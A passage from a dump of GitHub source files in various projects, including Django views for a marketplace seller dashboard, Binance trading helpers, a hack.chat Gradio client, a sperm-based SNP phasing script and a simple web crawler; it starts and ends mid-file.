Magic!\n\n data = function(token)\n sorted_by_date = sorted(data, key=lambda x: x[\"date\"], reverse=True)\n paginator = Paginator(sorted_by_date, 32)\n page_number = request.GET.get(\"page\")\n page_obj = paginator.get_page(page_number)\n\n # Get our statistics\n data = async_result.get()\n\n data[\"data\"] = page_obj\n\n return render(\n request,\n \"ordered.html\",\n data,\n )\n\n\n@login_required\n@api_key_required\ndef bought(request):\n return render_page(get_bought_products, request)\n\n\n@login_required\ndef api(request):\n logger.info(\"Api page requested...\")\n\n if ApiKey.objects.filter(user=request.user.id).exists():\n api = ApiKey.objects.get(user=request.user.id)\n else:\n api = None\n form = ApiForm(request.POST or None, instance=api)\n if form.is_valid():\n form.instance.user = request.user\n form.save()\n return render(request, \"api.html\", {\"form\": form, \"api\": api})\n\n\n@login_required\n@api_key_required\ndef weekly_orders_summary(request):\n # Statistics have 3 requests that take 30+ seconds, so we start another thread pool here\n # Tread doesn't support return value!\n token = ApiKey.objects.get(user=request.user.id).api\n pool = ThreadPool(processes=1)\n async_result = pool.apply_async(get_sales_statistics, (token,))\n # and actually 3 more threads inside. Magic!\n\n with concurrent.futures.ThreadPoolExecutor() as executor:\n logger.info(\"Concurrent analytics dicts\")\n future1 = executor.submit(\n get_ordered_products, token=token, week=False, flag=0, days=14\n )\n future2 = executor.submit(get_stock_as_dict, request)\n data = future1.result()\n stock = future2.result()\n logger.info(\"We've got STOCK and DATA\")\n\n combined = dict()\n to_order = request.GET.get(\"to_order\", False)\n\n for item in data:\n\n wb_id = item[\"nmId\"]\n sku = item[\"supplierArticle\"]\n size = item[\"techSize\"]\n qty = item.get(\"quantity\", 0)\n stock_data = stock.get(wb_id, {\"stock\": 0})\n\n if wb_id not in combined:\n combined[wb_id] = {\n \"sizes\": {size: qty},\n \"total\": qty,\n \"sku\": sku,\n \"stock\": stock_data.get(\"stock\", 0),\n \"stock_sizes\": stock_data.get(\"sizes\", dict()),\n }\n else:\n editing = combined[wb_id] # this is pointer to object in memory\n editing[\"sizes\"][size] = editing[\"sizes\"].get(size, 0) + qty\n editing[\"total\"] += qty\n editing[\"stock_sizes\"] = (stock_data.get(\"sizes\", dict()),)\n\n unsorted_data = tuple(combined.items())\n sorted_data = sorted(unsorted_data, key=lambda x: x[1][\"total\"], reverse=True)\n if to_order:\n sorted_data = tuple(\n filter(lambda x: x[1][\"total\"] > x[1][\"stock\"], sorted_data)\n )\n paginator = Paginator(sorted_data, 32)\n page_number = request.GET.get(\"page\")\n page_obj = paginator.get_page(page_number)\n\n # Get our statistics\n data = async_result.get()\n data[\"data\"] = page_obj\n\n return render(\n request,\n \"summary.html\",\n data,\n )\n\n\ndef get_stock_as_dict(request):\n \"\"\"Must be rewritten with saving to DB\"\"\"\n logger.info(\"Getting stock as dict\")\n token = ApiKey.objects.get(user=request.user.id).api\n stock = get_stock_products(token)\n stock_as_dict = dict()\n for item in stock:\n key = item[\"nmId\"] # wb_id\n price = int(item[\"Price\"] * ((100 - item[\"Discount\"]) / 100))\n data = {\n \"wb_id\": item[\"nmId\"],\n \"sku\": item[\"supplierArticle\"],\n \"price\": price,\n }\n data = stock_as_dict.get(key, data)\n\n data[\"in\"] = data.get(\"in\", 0) + item.get(\"inWayToClient\",0)\n data[\"out\"] = data.get(\"out\", 0) + item.get(\"inWayFromClient\",0)\n 
data[\"stock\"] = data.get(\"stock\", 0) + item.get(\"quantityFull\",0)\n\n sizes = data.get(\"sizes\", dict())\n size = item.get(\"techSize\", 0)\n sizes[size] = sizes.get(size, 0) + item.get(\"quantityFull\",0)\n\n data[\"sizes\"] = sizes\n stock_as_dict[key] = data\n\n logging.warning(stock_as_dict.get(11034009, None))\n\n return stock_as_dict\n\n\n@login_required\n@api_key_required\ndef add_to_cart(request):\n cart = json.loads(request.session.get(\"json_cart2\", \"{}\"))\n\n wb_id = request.GET.get(\"wb_id\")\n qty = request.GET.get(\"qty\")\n sku = request.GET.get(\"sku\")\n size = request.GET.get(\"size\")\n update = request.GET.get(\"update\", False)\n logging.warning(sku)\n\n item = cart.get(wb_id, dict())\n item[\"sku\"] = sku\n sizes = item.get(\"sizes\", dict())\n if update:\n sizes[size] = int(qty)\n else:\n sizes[size] = sizes.get(size, 0) + int(qty)\n if sizes[size] == 0:\n sizes.pop(size, None)\n if not sizes:\n cart.pop(wb_id, None)\n else:\n item[\"sizes\"] = sizes\n cart[wb_id] = item\n\n request.session[\"json_cart2\"] = json.dumps(cart)\n return HttpResponse(len(cart))\n\n\n@login_required\n@api_key_required\ndef cart(request):\n cart = json.loads(request.session.get(\"json_cart2\", \"{}\"))\n logging.warning(cart)\n cart = tuple(cart.items())\n logging.warning(cart)\n paginator = Paginator(cart, 32)\n page_number = request.GET.get(\"page\")\n page_obj = paginator.get_page(page_number)\n data = dict()\n data[\"data\"] = page_obj\n\n return render(\n request,\n \"cart.html\",\n data,\n )\n","repo_name":"matacoder/wildberries-rest-api","sub_path":"wb/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14754,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"75"} +{"seq_id":"38809917688","text":"from sys import path\npath.append(r'..\\ksoc_wifi_connection\\ksoc_wifi_connection')\nfrom ksoc_connection import *\nimport time\n\nHOST = '192.168.2.1'\nPORT = 80\n\nif __name__ == '__main__':\n integration = KKTIntegration(KKTVComPortConnection(timeout=1))\n integration.connectDevice()\n print(f'Chirp ID : {integration.getChipID()[1]}')\n read = integration.readHWRegister(0x50000530)\n print(f'read reg ({hex(0x50000504)}) : {read[0]} {hex(read[1])}')\n print(f'write reg ({hex(0x50000504)}) : {integration.writeHWRegister(0x50000504, 0x00000000)}')\n read = integration.readHWRegister(0x50000504)\n print(f'read reg ({hex(0x50000504)}) : {read[0]} {hex(read[1])}')\n # integration.setPowerSavingMode(2)\n # print(f'power saving mode: {integration.getPowerSavingMode()[1]}')\n integration.switchCollectionOfMultiResults(actions=0b1, read_interrupt=0, clear_interrupt=0, raw_size=(8192+2)*2, ch_of_RBank=1, reg_address=[])\n s = time.time_ns()\n for i in range(20):\n print(f'=================={i}==================')\n data = integration.getMultiResults()[1]\n print(f'getMultiResults : {data[0][:4].hex(\" \")}')\n print(f'getMultiResults time : {(time.time_ns()-s)/1000000} ms')\n s = time.time_ns()\n\n\n print(integration.switchCollectionOfMultiResults(actions=0b0, read_interrupt=0, clear_interrupt=0, raw_size=(8192 + 2) * 2,\n ch_of_RBank=1, reg_address=[]))\n\n integration.disconnectDevice()\n\n","repo_name":"lianyun0502/KSOC_Connection","sub_path":"example/get_168_results.py","file_name":"get_168_results.py","file_ext":"py","file_size_in_byte":1496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"14658142891","text":"from win32con import NULL\r\nfrom process_interface 
import ProcessInterface\r\nfrom infobox import InfoBoxClass\r\nfrom JSONMethods import JSON\r\nfrom OptionsMenu import Options\r\nimport os, sys\r\n\r\nprocess = ProcessInterface()\r\ninfo = InfoBoxClass\r\noptions = Options\r\nJayson = JSON\r\n\r\nfileName = \"DS3C_Savedata\"\r\njsonData = {}\r\nsendToDir = os.getenv('APPDATA')\r\npath = \"./\"\r\n\r\nfonts = []\r\nimport matplotlib.font_manager as fm\r\nfor f in fm.fontManager.ttflist: # lists all font families\r\n fonts.append(f.name)\r\n\r\nontop = False\r\nontop2 = False\r\nfirstclick = True\r\n\r\nfileName = \"DS3C_Savedata\"\r\nactualData = 0\r\ncolourCodeFont = \"white\"\r\ncolourCodeBack = \"green\"\r\ntxtFont = \"Comic Sans MS\"\r\nconnectedToGame = True # for when program loses connection to the game after connecting to it\r\nlookForGame = NULL\r\n\r\ndef resource_path(relative_path):\r\n \"\"\" Get absolute path to resource, works for dev and for PyInstaller \"\"\"\r\n try: \r\n # PyInstaller creates a temp folder and stores path in _MEIPASS # thanks stackoverflow :)\r\n base_path = sys._MEIPASS\r\n except Exception:\r\n base_path = os.path.abspath(\".\")\r\n\r\n return os.path.join(base_path, relative_path)\r\n","repo_name":"KarolWasTaken/DS3C","sub_path":"variables.py","file_name":"variables.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"17698856874","text":"import gradio as gr\nimport random\nimport time\nimport websocket,json\n\nws=websocket.create_connection('wss://hack.chat/chat-ws')\n\nwith gr.Blocks() as demo:\n _chat_history=None\n chatbot = gr.Chatbot()\n msg = gr.Textbox()\n mynick = gr.Textbox(label='Nick first')\n\n def respond(message, chat_history):\n global _chat_history\n ws.send(json.dumps({'cmd':'chat','text':message}))\n chat_history.append((message,None))\n _chat_history=chat_history\n return \"\", chat_history\n \n def join(nick):\n ws.send(json.dumps({'cmd':'join','nick':nick,'channel':'your-channel'}))\n return None\n\n\n def get_plot(mynick,chat_history):\n data=json.loads(ws.recv())\n\n if data['cmd']=='chat':\n nick=data['nick']\n if nick==mynick:\n print('hm')\n return _chat_history\n text=data['text']\n trip=data.get('trip')\n _text=str(trip)+' '+nick+':\\n'+text\n chat_history.append(( None,_text))\n\n elif data['cmd']=='onlineAdd':\n nick=data['nick']\n trip=data.get('trip')\n _text='* '+str(trip)+' '+nick+' joined'\n chat_history.append(( None,_text))\n\n elif data['cmd']=='onlineRemove':\n nick=data['nick']\n _text='* '+nick+' left'\n chat_history.append(( None,_text))\n\n elif data['cmd']=='updateUser':\n nick=data['nick']\n _text='* '+nick+' updated'\n chat_history.append(( None,_text))\n\n elif data['cmd']=='warn':\n text=data['text']\n _text='! 
'+text\n chat_history.append(( None,_text))\n\n elif data['cmd']=='info':\n text=data['text']\n _text='** '+text\n chat_history.append(( None,_text))\n\n elif data['cmd']=='emote':\n text=data['text']\n _text='*** '+text\n chat_history.append(( None,_text))\n\n else:\n chat_history.append(( None,json.dumps(data)))\n\n return chat_history\n\n\n msg.submit(respond, [msg, chatbot], [msg, chatbot])\n mynick.submit(join, mynick, None, queue=False)\n dep = demo.load(get_plot, [mynick,chatbot], chatbot, every=1)\n\n\n\nif __name__ == \"__main__\":\n demo.queue().launch()\n\n","repo_name":"huolongguo1O/HCGradio","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"32154373567","text":"# Given the root of a binary tree, return all root-to-leaf paths in any order.\n\n# A leaf is a node with no children.\n\n# Recurivse DFS\n\nclass Solution:\n def binaryTreePaths(self, root: Optional[TreeNode]) -> List[str]:\n if not root: return \"\"\n res = []\n self.dfsHelper(root, \"\", res)\n return res\n\n def dfsHelper(self, root, tempPath, res):\n if not root: return\n \n if not root.left and not root.right:\n res.append(tempPath + str(root.val))\n return\n \n if root.left:\n self.dfsHelper(root.left, tempPath + str(root.val) + \"->\", res)\n \n if root.right:\n self.dfsHelper(root.right, tempPath + str(root.val) + \"->\", res)\n\n\n# Iterative DFS:\n\nclass Solution(object):\n def binaryTreePaths(self, root):\n if not root: return \"\"\n stack = [(root, \"\")]\n res = []\n \n while stack:\n node, curPath = stack.pop()\n if not node.left and not node.right:\n res.append(curPath + str(node.val))\n if node.left:\n stack.append((node.left, curPath + str(node.val) + \"->\"))\n if node.right:\n stack.append((node.right, curPath + str(node.val) + \"->\"))\n return res\n","repo_name":"Dhaaaf/Leetcoding","sub_path":"257.binaryTreePaths.py","file_name":"257.binaryTreePaths.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"70700565361","text":"# Impor pustaka yang dibutuhkan\nimport time\nimport psutil\nimport plotly.graph_objects as go\n\n# Buat variabel untuk menyimpan data bandwidth\nbandwidth_data = {\"time\": [], \"upload\": [], \"download\": []}\n\n# Buat fungsi untuk mengubah byte menjadi megabit\ndef convert_to_mbit(value):\n return value / 1024 / 1024 * 8\n\n# Buat fungsi untuk mengirim data bandwidth ke plotly\ndef send_data():\n # Buat objek grafik garis dengan data bandwidth\n fig = go.Figure()\n fig.add_trace(go.Scatter(x=bandwidth_data[\"time\"], y=bandwidth_data[\"upload\"], mode=\"lines\", name=\"Upload\"))\n fig.add_trace(go.Scatter(x=bandwidth_data[\"time\"], y=bandwidth_data[\"download\"], mode=\"lines\", name=\"Download\"))\n\n # Atur judul dan label sumbu grafik\n fig.update_layout(title=\"Bandwidth Monitor\", xaxis_title=\"Time\", yaxis_title=\"Speed (Mbps)\")\n\n # Tampilkan grafik di browser\n fig.show()\n\n# Tentukan interval waktu dalam detik\ninterval = 1\n\n# Tentukan durasi pengukuran dalam detik\nduration = 10\n\n# Tentukan waktu mulai pengukuran\nstart_time = time.time()\n\n# Ulangi pengukuran selama durasi yang ditentukan\nwhile time.time() - start_time < duration:\n # Dapatkan jumlah byte yang dikirim dan diterima pada waktu sekarang\n net1 = psutil.net_io_counters()\n\n # Tunggu selama interval waktu\n time.sleep(interval)\n\n # Dapatkan jumlah 
byte yang dikirim dan diterima pada waktu berikutnya\n net2 = psutil.net_io_counters()\n\n # Hitung kecepatan upload dan download dalam megabit per detik\n upload = convert_to_mbit(net2.bytes_sent - net1.bytes_sent) / interval\n download = convert_to_mbit(net2.bytes_recv - net1.bytes_recv) / interval\n\n # Cetak kecepatan upload dan download di konsol\n print(f\"Upload: {upload:.2f} Mbps, Download: {download:.2f} Mbps\")\n\n # Simpan data bandwidth ke variabel\n bandwidth_data[\"time\"].append(time.strftime(\"%H:%M:%S\"))\n bandwidth_data[\"upload\"].append(upload)\n bandwidth_data[\"download\"].append(download)\n\n# Kirim data bandwidth ke plotly untuk divisualisasikan\nsend_data()","repo_name":"pang53rut/ptyhon","sub_path":"Latihan python/link_list.py","file_name":"link_list.py","file_ext":"py","file_size_in_byte":2028,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"5615452262","text":"from data_access.internet import send_get_request_with_header, send_delete_request_with_header\n\nfrom utils.debug_utils import print_to_console, LOG_ALL_MARKET_RELATED_CRAP, get_logging_level, \\\n ERROR_LOG_FILE_NAME, LOG_ALL_DEBUG, DEBUG_LOG_FILE_NAME\n\nfrom utils.key_utils import signed_body_256\nfrom utils.time_utils import get_now_seconds_utc_ms\nfrom utils.file_utils import log_to_file\n\nfrom binance.constants import BINANCE_CANCEL_ORDER, BINANCE_DEAL_TIMEOUT, BINANCE_GET_ALL_TRADES\nfrom binance.error_handling import is_error\nfrom binance.rest_api import generate_post_request\n\n\ndef cancel_order_binance(key, pair_name, order_id):\n\n body = {\n \"recvWindow\": 5000,\n \"timestamp\": get_now_seconds_utc_ms(),\n \"symbol\": pair_name,\n \"orderId\": order_id\n }\n\n post_details = generate_post_request(BINANCE_CANCEL_ORDER, body, key)\n\n if get_logging_level() >= LOG_ALL_MARKET_RELATED_CRAP:\n msg = \"cancel_order_binance: url - {url} headers - {headers} body - {body}\".format(\n url=post_details.final_url, headers=post_details.headers, body=post_details.body)\n print_to_console(msg, LOG_ALL_MARKET_RELATED_CRAP)\n log_to_file(msg, \"market_utils.log\")\n\n err_msg = \"cancel binance order with id {id}\".format(id=order_id)\n\n res = send_delete_request_with_header(post_details, err_msg, max_tries=3)\n\n if get_logging_level() >= LOG_ALL_MARKET_RELATED_CRAP:\n print_to_console(res, LOG_ALL_MARKET_RELATED_CRAP)\n log_to_file(res, \"market_utils.log\")\n\n return res\n\n\ndef parse_order_id_binance(json_document):\n \"\"\"\n {u'orderId': 6599290,\n u'clientOrderId': u'oGDxv6VeLXRdvUA8PiK8KR',\n u'origQty': u'27.79000000',\n u'symbol': u'OMGBTC',\n u'side': u'SELL',\n u'timeInForce': u'GTC',\n u'status': u'FILLED',\n u'transactTime': 1514223327566,\n u'type': u'LIMIT',\n u'price': u'0.00111100',\n u'executedQty': u'27.79000000'}\n \"\"\"\n\n if is_error(json_document):\n\n msg = \"parse_order_id_binance - error response - {er}\".format(er=json_document)\n log_to_file(msg, ERROR_LOG_FILE_NAME)\n\n return None\n\n if \"orderId\" in json_document:\n return json_document[\"orderId\"]\n\n return None\n\n\ndef get_trades_history_binance(key, pair_name, limit, last_order_id=None):\n final_url = BINANCE_GET_ALL_TRADES\n\n body = []\n\n if last_order_id is not None:\n body.append((\"fromId\", last_order_id))\n\n body.append((\"symbol\", pair_name))\n body.append((\"limit\", limit))\n body.append((\"timestamp\", get_now_seconds_utc_ms()))\n body.append((\"recvWindow\", 5000))\n body.append((\"signature\", signed_body_256(body, key.secret)))\n\n 
post_details = generate_post_request(final_url, body, key)\n\n if get_logging_level() >= LOG_ALL_DEBUG:\n msg = \"get_trades_history_binance: {res}\".format(res=post_details)\n print_to_console(msg, LOG_ALL_DEBUG)\n log_to_file(msg, DEBUG_LOG_FILE_NAME)\n\n err_msg = \"get_all_trades_binance for {pair_name}\".format(pair_name=pair_name)\n\n error_code, res = send_get_request_with_header(post_details.final_url, post_details.headers, err_msg,\n timeout=BINANCE_DEAL_TIMEOUT)\n\n if get_logging_level() >= LOG_ALL_DEBUG:\n msg = \"get_all_trades_binance: {er_c} {r}\".format(er_c=error_code, r=res)\n print_to_console(msg, LOG_ALL_DEBUG)\n log_to_file(msg, DEBUG_LOG_FILE_NAME)\n\n return error_code, res\n","repo_name":"kruglov-dmitry/crypto_crawler","sub_path":"binance/market_utils.py","file_name":"market_utils.py","file_ext":"py","file_size_in_byte":3465,"program_lang":"python","lang":"en","doc_type":"code","stars":123,"dataset":"github-code","pt":"75"} +{"seq_id":"12622063064","text":"from framework.wsgi import Framework\nfrom framework.view import (HomeView, AboutView, CategoriesView,\n CategoryEdit, CourseEdit, CourseView)\nfrom framework.url import Url\n\n# noinspection PyTypeChecker\nurls = [\n Url('/', HomeView),\n Url('/about', AboutView),\n Url('/categories', CategoriesView),\n Url('/category_edit', CategoryEdit),\n Url('/course', CourseView),\n Url('/course_edit', CourseEdit),\n]\n\napp = Framework(urls)","repo_name":"Tititun/architecture","sub_path":"lesson_4/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"46868178682","text":"# Question Link - https://leetcode.com/problems/find-missing-observations/\n\n# Solution - \n\nclass Solution:\n def missingRolls(self, rolls: List[int], mean: int, n: int) -> List[int]:\n m = len(rolls)\n total_sum = mean*(m+n)\n required_sum = total_sum - sum(rolls)\n if required_sum < n or required_sum > 6*n:\n return []\n each = required_sum // n\n ans = [each for i in range(n)]\n rem = required_sum - each*n\n i = 0\n while rem:\n ans[i] += 1\n i += 1\n rem -= 1\n return ans\n","repo_name":"codethat-vivek/Code","sub_path":"LeetCode/Find Missing Observations.py","file_name":"Find Missing Observations.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"13523140436","text":"import url_manager\nimport html_downloader\nimport html_parser\nimport html_outputer\n\n\n# 爬虫总调度程序,执行函数\nclass SpiderMain(object):\n # 爬虫总调度程序会使用 url 管理器, html 的下载器,解析器,输出器,下面初始化一下:\n def __init__(self):\n self.urls = url_manager.UrlManager()\n self.downloader = html_downloader.HtmlDownloader()\n self.parser = html_parser.HtmlParser()\n self.outputer = html_outputer.HtmlOutputer()\n\n def craw(self, root_url):# craw 方法,爬虫调度程序\n count = 1\n # 入口 url 添加到 url 管理器\n self.urls.add_new_url(root_url)\n # 启动爬虫循环\n while self.urls.has_new_url():\n try:\n # 当 url 管理器里待爬取的 url 时,获取一个\n new_url = self.urls.get_new_url()\n print('craw %d : %s' %(count, new_url))# 打印传入的第几个 url\n # 启动下载器并存储\n html_cont = self.downloader.download(new_url)\n # 解析数据\n new_urls, new_data = self.parser.parse(new_url, html_cont)\n # 添加进 url 管理器\n self.urls.add_new_urls(new_urls)\n # 收集数据\n self.outputer.collect_data(new_data)\n # 为防止爬虫程序突然崩溃,每100个就写入一次保存\n if count % 100 == 0:\n self.outputer.output_html()\n # 你可以设置的最大爬取上线\n if count == 1000:\n break\n\n count += 1\n except Exception as e:\n 
print('crew failed:', e)\n # 输出收集好的数据\n self.outputer.output_html()\n\nif __name__==\"__main__\":\n root_url = \"http://baike.baidu.com/item/Python\" # 这里写上最开始的页面url\n obj_spider = SpiderMain()\n obj_spider.craw(root_url) # 启动爬虫","repo_name":"zxc479773533/A-python-spider","sub_path":"spider_main.py","file_name":"spider_main.py","file_ext":"py","file_size_in_byte":1997,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"70523299764","text":"import os\nimport pandas as pd\nmaster_df = pd.DataFrame()\nf1 = pd.read_csv('patient-characteristics-survey-pcs-2013-1.csv')\nf2 = pd.read_csv('patient-characteristics-survey-pcs-2017-1.csv')\nmaster_df = master_df.append(f1)\nmaster_df = master_df.append(f2)\nmaster_df.to_csv('Data_Tuto_2013_2017.csv', index=False)\n\n# Path: merge csv files .py\n","repo_name":"sakkovic/Stroke-Detection-and-outcome-prediction","sub_path":"Stroke Prediction/merge csv files .py","file_name":"merge csv files .py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"3659763085","text":"import argparse\n\nimport torch\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('--text', help='checkpoint file')\n parser.add_argument('--image', help='checkpoint file')\n parser.add_argument('--video', help='checkpoint file')\n parser.add_argument('--audio', help='checkpoint file')\n parser.add_argument('--out', help='checkpoint file')\n parser.add_argument('--no_keep_head', default=False, action='store_true')\n return parser.parse_args()\n\n\ndef main():\n args = parse_args()\n\n text_ckpt = torch.load(args.text)\n image_ckpt = torch.load(args.image)\n video_ckpt = torch.load(args.video)\n audio_ckpt = torch.load(args.audio)\n if 'state_dict' in text_ckpt.keys():\n text_ckpt = text_ckpt['state_dict']\n if 'state_dict' in image_ckpt.keys():\n image_ckpt = image_ckpt['state_dict']\n if 'state_dict' in video_ckpt.keys():\n video_ckpt = video_ckpt['state_dict']\n if 'state_dict' in audio_ckpt.keys():\n audio_ckpt = audio_ckpt['state_dict']\n ret = {}\n for typ, dic in zip(['text', 'image', 'video', 'audio'],\n [text_ckpt, image_ckpt, video_ckpt, audio_ckpt]):\n for key, val in dic.items():\n ret[typ + '_branch.' 
+ key] = val\n # if key.startswith(typ) and (not args.no_keep_head\n # or 'head' not in key):\n # ret[key] = val\n torch.save(ret, args.out)\n print(f'Saved as {args.out}')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Chrisfsj2051/Multi-Modal-Tagging","sub_path":"src/utils/tools/publish_model/merge_branch.py","file_name":"merge_branch.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"40972607747","text":"pares = []\r\ncount = 1\r\n\r\nrodar = True\r\n\r\nwhile rodar:\r\n if count == 6:\r\n rodar = False\r\n x = int(input('Digite um numero par: '))\r\n \r\n if x % 2 == 0:\r\n pares.append(x)\r\n count+=1\r\n\r\nprint('Numeros pares lidos na ordem inversa: ', *pares[::-1])\r\n","repo_name":"CleitonSilvaPaes/geek_university_exercicio","sub_path":"Secao07/09.py","file_name":"09.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"20898945432","text":"import sys\nimport copy\nimport pysam\nimport bisect\n\n# parameters\nminNumOfSperm = 2\nnumOfPhased = 5 # on each side to search\nsnpFold = 4 # >80% of nearby phased SNPs of each sperm must agree\nspermFold = 3 # >75% of voted sperm must agree\n\n# read IO locations from arguments\ninputVcfFile = sys.argv[1]\ninputDraftFile = open(sys.argv[2],\"r\")\nchrName = sys.argv[3]\n\nnumOfSperm=99\nchildId=numOfSperm+1\nfatherId=numOfSperm+0\nmotherId=numOfSperm+2\n\n# load already phased SNPs\nsys.stderr.write('reading phased SNPs\\n')\nphasedData = {}\nfor inputDraftLine in inputDraftFile:\n inputDraftLineData = inputDraftLine.strip().split()\n if inputDraftLineData[0][3:] != chrName: # assuming phased file has \"chr1\" style naming\n continue\n phasedData[int(inputDraftLineData[1])] = [inputDraftLineData[2],inputDraftLineData[3]]\n\n# open VCF file\nbcf_in = pysam.VariantFile(inputVcfFile)\nvcfSamples = bcf_in.header.samples\nchildSample = vcfSamples[childId]\nfatherSample = vcfSamples[fatherId]\nmotherSample = vcfSamples[motherId]\nspermSamples = []\nfor spermId in range(numOfSperm):\n spermSamples.append(vcfSamples[spermId])\n \n# build draft haplotypes based on phased SNPs\nsys.stderr.write('using phased SNPs to determine sperm haplotypes\\n')\ndraftLoci = []\ndraftHaplotypes = []\nfor rec in bcf_in.fetch():\n if rec.pos not in phasedData:\n continue # only use phased SNPs\n phasedNucleotides = phasedData[rec.pos]\n phasedHaplotype = []\n for spermSample in spermSamples:\n spermHaplotype = -1 # unknown\n if rec.samples[spermSample][\"GT\"][0] != None:\n spermNucleotide = rec.alleles[rec.samples[spermSample][\"GT\"][0]]\n if spermNucleotide == phasedNucleotides[0]:\n spermHaplotype = 0\n elif spermNucleotide == phasedNucleotides[1]:\n spermHaplotype = 1\n phasedHaplotype.append(spermHaplotype)\n draftLoci.append(rec.pos)\n draftHaplotypes.append(phasedHaplotype)\n #print rec.pos, phasedHaplotype\ndraftLoci, draftHaplotypes = zip(*sorted(zip(draftLoci, draftHaplotypes)))\n\n# start phasing\nphasingCounter = 0\nsys.stderr.write('using sperm haplotypes to phase unknown SNPs\\n')\nfor rec in bcf_in.fetch():\n childGenotype = rec.samples[childSample][\"GT\"]\n #fatherGenotype = rec.samples[fatherSample][\"GT\"]\n #motherGenotype = rec.samples[motherSample][\"GT\"]\n vcfAlleles = rec.alleles\n spermGenotypes = []\n if childGenotype[0] == childGenotype[1]:\n continue # only use het\n if rec.pos in phasedData:\n continue # only study 
unknown\n leftGenotype = childGenotype[0]\n rightGenotype = childGenotype[1]\n spermVotes = [0, 0] # left=pat vs. left=mat\n for spermId in range(numOfSperm):\n spermGenotype = rec.samples[spermSamples[spermId]][\"GT\"][0]\n if spermGenotype == leftGenotype:\n spermSide = 0\n elif spermGenotype == rightGenotype:\n spermSide = 1\n else:\n continue\n siteVotes = [0, 0]\n posId = bisect.bisect_left(draftLoci, rec.pos)\n\n counter = 0\n for i in range(posId-1, 0, -1):\n if draftHaplotypes[i][spermId] < 0:\n continue\n if draftHaplotypes[i][spermId] == spermSide:\n siteVotes[0] += 1\n else:\n siteVotes[1] += 1\n counter += 1\n if counter >= numOfPhased:\n break\n\n counter = 0\n for i in range(posId, len(draftLoci), 1):\n if draftHaplotypes[i][spermId] < 0:\n continue\n if draftHaplotypes[i][spermId] == spermSide:\n siteVotes[0] += 1\n else:\n siteVotes[1] += 1\n counter += 1\n if counter >= numOfPhased:\n break\n\n if siteVotes[0] > snpFold * siteVotes[1]: # > 80% of SNPs agree on a haplotype\n spermVotes[0] += 1\n elif siteVotes[1] > snpFold * siteVotes[0]:\n spermVotes[1] += 1\n if spermVotes[0] + spermVotes[1] < minNumOfSperm: # needs at least two sperms cover\n continue\n if spermVotes[0] > spermFold * spermVotes[1]: # needs > 3x majority vote\n phasingCounter += 1\n sys.stdout.write(chrName+'\\t'+str(rec.pos)+'\\t'+vcfAlleles[leftGenotype]+'\\t'+vcfAlleles[rightGenotype]+'\\n')\n if phasingCounter % 1000 == 0:\n sys.stderr.write('phased '+str(phasingCounter)+' SNPs\\n')\n elif spermVotes[1] > spermFold * spermVotes[0]: # needs > 3x majority vote\n phasingCounter += 1\n sys.stdout.write(chrName+'\\t'+str(rec.pos)+'\\t'+vcfAlleles[rightGenotype]+'\\t'+vcfAlleles[leftGenotype]+'\\n')\n if phasingCounter % 1000 == 0:\n sys.stderr.write('phased '+str(phasingCounter)+' SNPs\\n')","repo_name":"tanlongzhi/dip-c","sub_path":"legacy/phase_sperm.py","file_name":"phase_sperm.py","file_ext":"py","file_size_in_byte":4743,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"75"} +{"seq_id":"4446875991","text":"import numpy as np\nfrom itertools import cycle, accumulate\n\n\ndef part1(filename):\n with open(filename) as f:\n data = f.readlines()\n\n data = np.asarray(list(map(int, data)))\n print(data.sum())\n\n\ndef part2(filename):\n with open(filename) as f:\n data = f.readlines()\n data = list(map(int, data))\n\n # freq = 0\n # freq_list = [0, ]\n # ptr = 0\n # while True:\n # freq = freq + data[ptr]\n # if freq in freq_list:\n # print(\"Repeated frequency:\", freq)\n # # break\n # exit(0)\n # else:\n # freq_list.append(freq)\n\n # ptr = (ptr + 1) % len(data)\n # # print(ptr, freq)\n\n # this is a faster solution using optimized itertools\n seen = set()\n print(next(f for f in accumulate(cycle(data)) if f in seen or seen.add(f)))\n\n\npart1(\"day1_1.txt\")\npart2(\"day1_1.txt\")\n","repo_name":"varunagrawal/advent-of-code","sub_path":"2018/day1.py","file_name":"day1.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"19109484801","text":"import random\r\nimport math\r\nimport sqlite3\r\nimport database as Database\r\nimport player as Player\r\nimport background as Background\r\n\r\nENTITY_TYPE_PLAYER = 1\r\n\r\nBACKGROUND_TYPE_ERROR = 0\r\nBACKGROUND_TYPE_DIRT = 1\r\nBACKGROUND_TYPE_GRASS = 2\r\n\r\ndef Init():\r\n\tglobal map, obj_seed\r\n\tmap={}\r\n\tobj_seed = Database.LoadWorldSeed()\r\n\tif not obj_seed:\r\n\t\tobj_seed = 
